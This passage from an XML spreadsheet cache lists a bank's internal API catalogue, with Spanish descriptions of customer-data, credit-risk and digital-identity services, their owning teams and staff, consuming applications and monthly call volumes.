    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <x v="18"/>
    <s v="Productor"/>
    <s v="Ecosistema de Riesgo de Crédito"/>
    <s v="Juliana Medina Martinez"/>
    <m/>
    <m/>
    <s v="PEP_AW1281002"/>
    <m/>
    <m/>
    <m/>
    <n v="8"/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-10-20T16:02:24"/>
    <s v="Customer Behavioral Models"/>
    <n v="204"/>
    <s v="Customer Behavioral Models - Behavioral"/>
    <n v="203"/>
    <x v="123"/>
    <s v="El API Customer Behavioral Models - Behavior V2.0.0 se encargará de calcular el score (calificación) de comportamiento de un cliente, lo cual se determina por medio de un nivel de riesgo, teniendo como dominio de valores G8 siendo este la calificación más alta de riesgo, dando a entender que esto implica un riesgo para el banco, hasta G1 siendo la calificación más baja, dando a entender que esto implica un riesgo bajo para el banco. La G de comportamiento en conjunto con otros conceptos entregan un riesgo consolidado para dar una decisión de aprobado o no en los productos del grupo Bancolombia que el cliente este solicitando"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <x v="18"/>
    <s v="Productor"/>
    <s v="Ecosistema de Riesgo de Crédito"/>
    <s v="Juliana Medina Martinez"/>
    <m/>
    <m/>
    <s v="CentralesPrecalculadas_NU0032001 _x000d__x000a_ BIZAGIBEG_AW1176001 _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ PricingBusiness_NU0091001 _x000d__x000a_ PricingBusiness_NU0091001"/>
    <m/>
    <m/>
    <m/>
    <n v="8"/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-10-20T16:02:24"/>
    <s v="Customer Behavioral Models"/>
    <n v="204"/>
    <s v="Customer Behavioral Models - Indebtedness"/>
    <n v="101"/>
    <x v="124"/>
    <s v="El API Customer Behavioral Models - Indebtedness V1.0 podrá exponer el resumen del endeudamiento de los clientes con productos Bancolombia, en los cuales se evidencia el detalle a nivel de modalidad y las cuotas que tienen en calidad de titular, cotitular o como deuda indirecta de un grupo de riesgo"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <x v="18"/>
    <s v="Productor"/>
    <s v="Ecosistema de Riesgo de Crédito"/>
    <s v="Juliana Medina Martinez"/>
    <s v=""/>
    <m/>
    <s v="CentralesPrecalculadas_NU0032001 _x000d__x000a_ BIZAGIBEG_AW1176001 _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ PricingBusiness_NU0091001 _x000d__x000a_ PricingBusiness_NU0091001"/>
    <n v="735"/>
    <n v="889"/>
    <n v="1025"/>
    <n v="1096"/>
    <n v="1003"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-11-22T09:28:01"/>
    <s v="Customer Behavioral Models"/>
    <n v="204"/>
    <s v="Customer Behavioral Models - Payment Capacity"/>
    <n v="102"/>
    <x v="125"/>
    <s v="El API Customer Behavioral Models - Payment Capacity V1.0.0 se encarga de exponer la información de Capacidad de Pago del cliente persona natural, la cual contiene tanto los ingresos como los egresos estimados del cliente por los diferentes modelos de riesgos, para que sea consumida por cualquier área del banco que necesite esta información para apoyar los procesos internos"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <x v="18"/>
    <s v="Productor"/>
    <s v="Ecosistema de Riesgo de Crédito"/>
    <s v="Juliana Medina Martinez"/>
    <m/>
    <m/>
    <s v="CentralesPrecalculadas_NU0032001 _x000d__x000a_ BIZAGIBEG_AW1176001 _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ PricingBusiness_NU0091001 _x000d__x000a_ PricingBusiness_NU0091001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-10-24T22:35:19"/>
    <s v="Customer Behavioral Models"/>
    <n v="101"/>
    <s v="Customer Behavioral Models - Payment Obligations"/>
    <n v="101"/>
    <x v="126"/>
    <s v="El API brindará la capacidad de consultar el vector de mora, es decir, el comportamiento de pago de un cliente en un periodo de 6 meses, para consultar la cantidad máxima de dí­as en mora en una obligación, lo anterior para validar si es posible realizar una modificación, reestructuracion o mantenimiento sobre la obligación. Una modificación es cualquier cambio que el banco le quiere ofrecer al cliente sobre una o varias obligaciones en cualquier momento, para poder realizar una modificación a una obligación, es necesario cumplir con ciertos requisitos, no tener mora superior a 30 dí­as en los íºltimos 6 meses (maxArrear), es importante no tener ningíºn tipo de marca 026, de tipo reestructuración anterior en la obligación (Brand). Una reestructuracion es una modificación sobre una obligación cuando el cliente tuvo algíºn incumplimiento en sus pagos, las reestructuraciones tienen ciertas restricciones de tiempos y reglas impuestas por el banco para poder ser aplicadas al cliente. Un mantenimiento es realizarle una modificación a alguna de las condiciones generales de la obligación, ejemplo la tasa, el plazo o la amortización, esta modificación se le puede ofrecer al cliente cuando hay un comportamiento recurrente y el banco identifica una mejora en el pago con esta modificación. Una obligación castigada no es objeto de mantenimiento ni de modificación."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <x v="24"/>
    <s v="Productor Transversal"/>
    <m/>
    <s v="David Esteban Lugo Posada"/>
    <m/>
    <m/>
    <s v="PEP_AW1281002"/>
    <n v="495"/>
    <n v="68"/>
    <n v="89"/>
    <n v="1482"/>
    <n v="1423"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-10-20T16:02:24"/>
    <s v="Customer Behavioral Models"/>
    <n v="204"/>
    <s v="Customer Behavioral Models - Payment Obligations"/>
    <n v="201"/>
    <x v="126"/>
    <s v="El API brindará la capacidad de consultar el vector de mora, es decir, el comportamiento de pago de un cliente en un periodo de 6 meses, para consultar la cantidad máxima de dí­as en mora en una obligación, lo anterior para validar si es posible realizar una modificación, reestructuracion o mantenimiento sobre la obligación. Una modificación es cualquier cambio que el banco le quiere ofrecer al cliente sobre una o varias obligaciones en cualquier momento, para poder realizar una modificación a una obligación, es necesario cumplir con ciertos requisitos, no tener mora superior a 30 dí­as en los íºltimos 6 meses (maxArrear), es importante no tener ningíºn tipo de marca 026, de tipo reestructuración anterior en la obligación (Brand). Una reestructuracion es una modificación sobre una obligación cuando el cliente tuvo algíºn incumplimiento en sus pagos, las reestructuraciones tienen ciertas restricciones de tiempos y reglas impuestas por el banco para poder ser aplicadas al cliente. Un mantenimiento es realizarle una modificación a alguna de las condiciones generales de la obligación, ejemplo la tasa, el plazo o la amortización, esta modificación se le puede ofrecer al cliente cuando hay un comportamiento recurrente y el banco identifica una mejora en el pago con esta modificación. Una obligación castigada no es objeto de mantenimiento ni de modificación."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <x v="24"/>
    <s v="Productor Transversal"/>
    <m/>
    <s v="David Esteban Lugo Posada"/>
    <s v=""/>
    <m/>
    <s v="CentralesPrecalculadas_NU0032001 _x000d__x000a_ BIZAGIBEG_AW1176001 _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ PricingBusiness_NU0091001 _x000d__x000a_ PricingBusiness_NU0091001"/>
    <n v="495"/>
    <n v="68"/>
    <n v="89"/>
    <n v="1482"/>
    <n v="1423"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-08-11T14:42:23"/>
    <s v="Customer Case Selfmanagement"/>
    <n v="100"/>
    <s v="Customer Case Selfmanagement - Cases"/>
    <n v="100"/>
    <x v="127"/>
    <s v="permite a los consumidores realizar la consulta sobre los casos generados por el proceso de autogestión reportados por parte de un cliente. Esta consulta podrá realizarse a partir de la identificación del cliente y un rango de fechas, por lo que devolverá 0 o muchos registros de acuerdo a los filtros ingresados."/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Facilitadores Digitales"/>
    <x v="7"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <m/>
    <s v="MascaraTransaccional_NU0021001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-10-13T08:15:31"/>
    <s v="Customer Case"/>
    <n v="101"/>
    <s v="Customer Case-PQRS"/>
    <n v="101"/>
    <x v="128"/>
    <s v="Por medio de este servicio web se gestionarán las solicitudes de un Cliente en lí­nea, desde radicar una solicitud en SAP-CRM, Consultar sus solicitudes, reasignar responsables de solucionar el requerimiento del cliente, hasta cerrar la Solicitud una vez se ha dado la solución al objeto de reclamo por el cliente."/>
    <s v="CLIENTES"/>
    <s v="Transversales Clientes"/>
    <x v="5"/>
    <s v="Productor"/>
    <s v="No aplica"/>
    <s v="Esteban Arroyave Montoya"/>
    <m/>
    <m/>
    <s v="ADA_NU0150001"/>
    <n v="27"/>
    <n v="61"/>
    <n v="27"/>
    <n v="24"/>
    <n v="89"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-04-27T11:00:55"/>
    <s v="Customer Commercial Data"/>
    <n v="100"/>
    <s v="Customer Commercial Data - Management"/>
    <n v="100"/>
    <x v="129"/>
    <s v="Permite realizar la consulta de la gestión comercial del cliente Colombia, tanto para persona jurí­dica, como para persona natural"/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <x v="17"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco "/>
    <s v="ConsultaGestionComercialCliente/V1.0"/>
    <m/>
    <s v="Thanos_AW1326001 _x000d__x000a_ LimitsCreditExhibition_NU0114001 _x000d__x000a_ LoansOffer_NU0102001 _x000d__x000a_ MsUtilities_NU0102001 _x000d__x000a_ HabitatCore_AW1281003 _x000d__x000a_ VisorInteractivo_AW1249001 _x000d__x000a_ VisorInteractivo_AW1249001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ RIGO_NU0135001 _x000d__x000a_ AppSarlaft_AW1176001 _x000d__x000a_ GestionVendor_AW0661003 _x000d__x000a_ salesforceAdapter_NU0254001 _x000d__x000a_ VINCUTRANS_NU0034001 _x000d__x000a_ EASYHOME_NU0004001"/>
    <n v="23170"/>
    <n v="49335"/>
    <n v="25980"/>
    <n v="29402"/>
    <n v="36749"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-04-27T14:37:38"/>
    <s v="Customer Contact"/>
    <n v="101"/>
    <s v="Customer Contact - Contact Information"/>
    <n v="101"/>
    <x v="130"/>
    <s v="Permite realizar la consulta de información para contactar al cliente Colombia, persona jurí­dica o persona natural, los datos de contacto son, por ejemplo: dirección de residencia, dirección de oficina, teléfono fijo, teléfono móvil, email, entre otros."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <x v="17"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco "/>
    <m/>
    <m/>
    <s v="SEG_NU0064001 _x000d__x000a_ TRACKINGSIM_NU0098001 _x000d__x000a_ NETWORKING_NU0046001 _x000d__x000a_ JornadaDepositos_NU0104001 _x000d__x000a_ Networking_NU0046001 _x000d__x000a_ DELFINWEB_AW0748001 _x000d__x000a_ Decision-Manager_NU0010001 _x000d__x000a_ Thanos_AW1326001 _x000d__x000a_ EASYHOME_NU0004001 _x000d__x000a_ ContactInfoMDM_AW0660001 _x000d__x000a_ AdaptadorMarketplace_NU0143001 _x000d__x000a_ aprobaciones_AW0360007 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ Portal Contenidos Bancolombia_AW1218001 _x000d__x000a_ LoansOffer_NU0102001 _x000d__x000a_ MsUtilities_NU0102001 _x000d__x000a_ AdquirenciaCargaMasiva_NU0142001 _x000d__x000a_ PSE-Pagos-Seguros-en-linea_NU0152001 _x000d__x000a_ AccountOpening_AW1480001 _x000d__x000a_ Kioscos_AW1272001 _x000d__x000a_ GestionVendor_AW0661003 _x000d__x000a_ PricingBusiness_NU0091001 _x000d__x000a_ TRACKING_NU0098001 _x000d__x000a_ EASYHOME_NU0004001 _x000d__x000a_ salesforceAdapter_NU0254001"/>
    <n v="327517"/>
    <n v="345337"/>
    <n v="294764"/>
    <n v="351097"/>
    <n v="456909"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-10-26T17:49:59"/>
    <s v="Customer Data"/>
    <n v="121"/>
    <s v="Customer Data - Keys"/>
    <n v="101"/>
    <x v="131"/>
    <s v="Permite consultar una llave de identificación especifica del cliente segíºn una identificación de entrada."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <x v="17"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco "/>
    <s v="ConsultaLlaveroCliente/V1.0"/>
    <m/>
    <s v="creditlens_NU0038001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ Portal Contenidos Bancolombia_AW1218001 _x000d__x000a_ LoansOffer_NU0102001 _x000d__x000a_ GestionVendor_AW0661003 _x000d__x000a_ salesforceAdapter_NU0254001"/>
    <n v="5080"/>
    <n v="12534"/>
    <n v="13396"/>
    <n v="17380"/>
    <n v="41948"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-10-26T17:49:59"/>
    <s v="Customer Data"/>
    <n v="121"/>
    <s v="Customer Data - Management"/>
    <n v="100"/>
    <x v="132"/>
    <s v="Permite la creación y modificación de la información del cliente directamente en el maestro de clientes del banco (MDM)."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <x v="17"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco "/>
    <s v="GestionCliente/V1.0"/>
    <m/>
    <s v="creditlens_NU0038001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ Portal Contenidos Bancolombia_AW1218001 _x000d__x000a_ LoansOffer_NU0102001 _x000d__x000a_ GestionVendor_AW0661003 _x000d__x000a_ salesforceAdapter_NU0254001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-10-26T17:49:59"/>
    <s v="Customer Data"/>
    <n v="121"/>
    <s v="Customer Data - Supplementary Information"/>
    <n v="201"/>
    <x v="133"/>
    <s v="Permite realizar la consulta de los datos personales del cliente Colombia, tanto para persona jurí­dica como para persona natural."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <x v="17"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco "/>
    <s v="ConsultaDatosComplementariosCliente/V1.0"/>
    <m/>
    <s v="creditlens_NU0038001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ Portal Contenidos Bancolombia_AW1218001 _x000d__x000a_ LoansOffer_NU0102001 _x000d__x000a_ GestionVendor_AW0661003 _x000d__x000a_ salesforceAdapter_NU0254001"/>
    <n v="745"/>
    <n v="699"/>
    <n v="607"/>
    <n v="534"/>
    <n v="621"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-11-05T16:21:04"/>
    <s v="Customer Digital Identity"/>
    <n v="100"/>
    <s v="Customer Digital Identity - Information"/>
    <n v="100"/>
    <x v="134"/>
    <s v="Esta API permite conocer si la identidad digital de un usuario se encuentra registrada y activa."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <m/>
    <s v="VDSORQUESTADORAUTOGESTIONBACK_NU0037002 _x000d__x000a_ GestionVendor_AW0661003 _x000d__x000a_ Portal Contenidos Bancolombia_AW1218001 _x000d__x000a_ TestApplication_AW1333002"/>
    <m/>
    <m/>
    <m/>
    <n v="80"/>
    <n v="79"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-11-05T16:21:04"/>
    <s v="Customer Digital Identity"/>
    <n v="100"/>
    <s v="Customer Digital Identity - Management"/>
    <n v="100"/>
    <x v="135"/>
    <s v="Esta API permite crear una transacción asociada a un tipo de trámite, a través de la cual se pueden realizar vinculaciones y autenticaciones de usuarios, así­ como obtener acceso a la información del usuario, previa autorización del mismo. Los tramites correponden a, trámite de registro, trámite de verificación de identidad"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <m/>
    <s v="VDSORQUESTADORAUTOGESTIONBACK_NU0037002 _x000d__x000a_ GestionVendor_AW0661003 _x000d__x000a_ Portal Contenidos Bancolombia_AW1218001 _x000d__x000a_ TestApplication_AW1333002"/>
    <n v="67"/>
    <n v="418"/>
    <n v="223"/>
    <n v="647"/>
    <n v="975"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-11-05T16:21:04"/>
    <s v="Customer Digital Identity"/>
    <n v="100"/>
    <s v="Customer Digital Identity - Transaction Information"/>
    <n v="100"/>
    <x v="136"/>
    <s v="Esta API permite la consulta de información sobre el estado de la transacción, así­ como los datos que ha compartido el usuario, segíºn el tipo de trámite. Los tramites correponden a, trámite de registro, trámite de verificación de identidad"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <m/>
    <s v="VDSORQUESTADORAUTOGESTIONBACK_NU0037002 _x000d__x000a_ GestionVendor_AW0661003 _x000d__x000a_ Portal Contenidos Bancolombia_AW1218001 _x000d__x000a_ TestApplication_AW1333002"/>
    <n v="5220"/>
    <n v="4317"/>
    <n v="6269"/>
    <n v="6332"/>
    <n v="5931"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-05-04T14:12:59"/>
    <s v="Customer Financial Data"/>
    <n v="111"/>
    <s v="Customer Financial Data - Financial Information"/>
    <n v="101"/>
    <x v="137"/>
    <s v="Permite realizar la consulta de la información financiera de los clientes, tal como: Ingresos, Egresos, Pasivos, Activos, entre otros."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <x v="17"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco "/>
    <s v="ConsultaDatosFinancierosCliente/V1.0"/>
    <m/>
    <s v="DELFINWEB_AW0748001 _x000d__x000a_ GestionVendor_AW0661003 _x000d__x000a_ salesforceAdapter_NU0254001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <n v="48"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-05-04T14:12:59"/>
    <s v="Customer Financial Data"/>
    <n v="111"/>
    <s v="Customer Financial Data - Tax Information"/>
    <n v="102"/>
    <x v="138"/>
    <s v="Permite consultar la información tributaria del cliente, estos datos corresponden a la información de impuestos, retención, entre otros."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <x v="17"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco "/>
    <s v="ConsultaDatosTributariosCliente/V1.0"/>
    <s v="MDM"/>
    <s v="DELFINWEB_AW0748001 _x000d__x000a_ GestionVendor_AW0661003 _x000d__x000a_ salesforceAdapter_NU0254001"/>
    <m/>
    <m/>
    <m/>
    <n v="3"/>
    <n v="37"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-04-04T15:48:58"/>
    <s v="Customer Information"/>
    <n v="100"/>
    <s v="Customer Information - Keys"/>
    <n v="100"/>
    <x v="139"/>
    <s v="API que permite consultar una llave de identificación especifica del cliente segíºn una identificación de entrada."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <x v="17"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco "/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-08-17T16:38:53"/>
    <s v="Customer Information Management"/>
    <n v="112"/>
    <s v="Customer Information Management - Management"/>
    <n v="112"/>
    <x v="140"/>
    <s v="Permite la creación y modificación de la información del cliente directamente en el maestro de clientes del banco (MDM)."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <x v="17"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco "/>
    <s v="GestionCliente/V1.0"/>
    <m/>
    <s v="salesforceAdapter_NU0254001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-11-19T17:52:03"/>
    <s v="Customer Management"/>
    <n v="100"/>
    <s v="Customer Management - Amount Limit Management"/>
    <n v="100"/>
    <x v="141"/>
    <s v="Esta API permite gestionar los topes que tiene un cliente. Los topes indican la cantidad de dinero que puede debitar dicho cliente durante el dí­a o mes segíºn sea el caso. Para esto, el servicio permitirá consultar el monto lí­mite establecido por el cliente desde la sucursal virtual personas o los montos establecidos por el banco y permitirá tener un acumulado de las transacciones hechas por el cliente durante el dí­a para poder determinar hasta qué momento puede debitarse de sus cuentas."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="6"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v="GestionDeTopesMontosClientes/V1.0"/>
    <m/>
    <s v="Recargas_AW1300001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ Thanos_AW1326001"/>
    <n v="875141"/>
    <n v="758501"/>
    <n v="745088"/>
    <n v="662870"/>
    <n v="803013"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-05-15T07:22:25"/>
    <s v="Customer Personal Data"/>
    <n v="103"/>
    <s v="Customer Personal Data - Information"/>
    <n v="103"/>
    <x v="142"/>
    <s v="Permite realizar la consulta de los datos personales del cliente Colombia, tanto para persona jurí­dica como para persona natural."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <x v="17"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco "/>
    <s v="ConsultaDatosPersonalesCliente/V1.0"/>
    <m/>
    <s v="ALM_AW0955001 _x000d__x000a_ ALM_AW0955 _x000d__x000a_ CGC_NU0014001 _x000d__x000a_ SEG_NU0064001 _x000d__x000a_ NETWORKING_NU0046001 _x000d__x000a_ JornadaDepositos_NU0104001 _x000d__x000a_ Networking_NU0046001 _x000d__x000a_ TMP_AW0955 _x000d__x000a_ VINCUTRANS_NU0034001 _x000d__x000a_ Thanos_AW1326001 _x000d__x000a_ SucursalVirtualValores_AW0638 _x000d__x000a_ AdaptadorMarketplace_NU0143001 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ LoansOffer_NU0102001 _x000d__x000a_ MsUtilities_NU0102001 _x000d__x000a_ AdquirenciaCargaMasiva_NU0142001 _x000d__x000a_ APP-PERSONAS_NU0146001 _x000d__x000a_ SVPSucursalVirtualPersonas_NU0149001 _x000d__x000a_ PSE-Pagos-Seguros-en-linea_NU0152001 _x000d__x000a_ AccountOpening_AW1480001 _x000d__x000a_ RIGO_NU0135001 _x000d__x000a_ BancolombiaPay_AW1435001 _x000d__x000a_ GestionVendor_AW0661003 _x000d__x000a_ PricingBusiness_NU0091001 _x000d__x000a_ salesforceAdapter_NU0254001 _x000d__x000a_ Galatea_NU0051001"/>
    <n v="2606116"/>
    <n v="2459726"/>
    <n v="2282047"/>
    <n v="8581277"/>
    <n v="9406094"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-05-19T12:32:28"/>
    <s v="Customer Personal Summary Data"/>
    <n v="100"/>
    <s v="Customer Personal Summary Data - Information"/>
    <n v="100"/>
    <x v="143"/>
    <s v="Permite realizar la consulta de los datos personales del cliente Colombia, tanto para persona jurí­dica como para persona natural."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <x v="17"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco "/>
    <m/>
    <m/>
    <s v="LoansOffer_NU0102001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-05-11T18:23:02"/>
    <s v="Customer Portfolio"/>
    <n v="100"/>
    <s v="Customer Portfolio - External Sources"/>
    <n v="100"/>
    <x v="144"/>
    <s v="Permite consultar información de diferentes fuentes píºblicas desde aplicaciones  que requieran acceder a este tipo de información. Ej: BDUA, RUES, RUNT, RUAF, PROCURADURí?A, SISBEN, DIAN, entre otras."/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Facilitadores Digitales"/>
    <x v="7"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <s v="ConsultaFuentesPublicasExternas/V1.0"/>
    <s v="Konivin - Vennko"/>
    <s v="MonitoreoDCM_NU0084001"/>
    <n v="60497"/>
    <n v="46015"/>
    <n v="45228"/>
    <n v="44692"/>
    <n v="37815"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-09-27T20:10:51"/>
    <s v="Customer Portfolio"/>
    <n v="120"/>
    <s v="Customer Portfolio - External Sources"/>
    <n v="120"/>
    <x v="144"/>
    <s v="Permite consultar información de diferentes fuentes píºblicas desde aplicaciones  que requieran acceder a este tipo de información. Ej: BDUA, RUES, RUNT, RUAF, PROCURADURí?A, SISBEN, DIAN, entre otras."/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Facilitadores Digitales"/>
    <x v="7"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <s v="ConsultaFuentesPublicasExternas/V1.0"/>
    <s v="Konivin - Vennko"/>
    <s v="GestionaNegocios_AW1302001 _x000d__x000a_ EDPYME_AW1170 _x000d__x000a_ APM_AW1081001 _x000d__x000a_ AdquirenciaCargaMasiva_NU0142001 _x000d__x000a_ VINCUTRANS_NU0034001"/>
    <n v="60497"/>
    <n v="46015"/>
    <n v="45228"/>
    <n v="44692"/>
    <n v="37815"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-12-02T08:44:49"/>
    <s v="Customer Product Eligibility"/>
    <n v="203"/>
    <s v="Customer Product Elegibility - Habitat"/>
    <n v="103"/>
    <x v="145"/>
    <s v="Esta API permite consultar la recomendación de diversos productos a los clientes basado en la analí­tica de su comportamiento y perfilamiento financiero. El origen de esta analí­tica de perfilamiento de productos es dictaminado por los datos con los que cuenta el banco de cada uno de sus clientes, analizando así­ que tipo de productos son los más cercanos a su realidad personal y financiera. Aquí­ podemos encontrar la operación que permite la recomendación de productos de vivienda."/>
    <s v="ECOSISTEMAS"/>
    <s v="Ecosistemas"/>
    <x v="25"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="MarketplaceEcosistemasPersonas_NU0035001"/>
    <n v="5709"/>
    <n v="4176"/>
    <n v="2291"/>
    <n v="813"/>
    <n v="913"/>
    <s v="API ONPMS EXT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-10-04T17:24:23"/>
    <s v="Customer Product Eligibility"/>
    <n v="203"/>
    <s v="Customer Product Elegibility - Vehicles"/>
    <n v="101"/>
    <x v="146"/>
    <s v="Esta API permite consultar la recomendación de diversos productos a los clientes basado en la analí­tica de su comportamiento y perfilamiento financiero. El origen de esta analí­tica de perfilamiento de productos es dictaminado por los datos con los que cuenta el banco de cada uno de sus clientes, analizando así­ que tipo de productos son los más cercanos a su realidad personal y financiera. Aquí­ podemos encontrar la operación que permite la recomendación de productos de vehiculo."/>
    <s v="ECOSISTEMAS"/>
    <s v="Ecosistemas"/>
    <x v="25"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="MarketplaceEcosistemasPersonas_NU0035001"/>
    <n v="2158"/>
    <n v="1680"/>
    <n v="1759"/>
    <n v="35"/>
    <n v="18"/>
    <s v="API ONPMS EXT"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-08-27T13:42:26"/>
    <s v="Customer Product Service Eligibility"/>
    <n v="100"/>
    <s v="Customer Product/Service Elegibility  Vehicles"/>
    <n v="100"/>
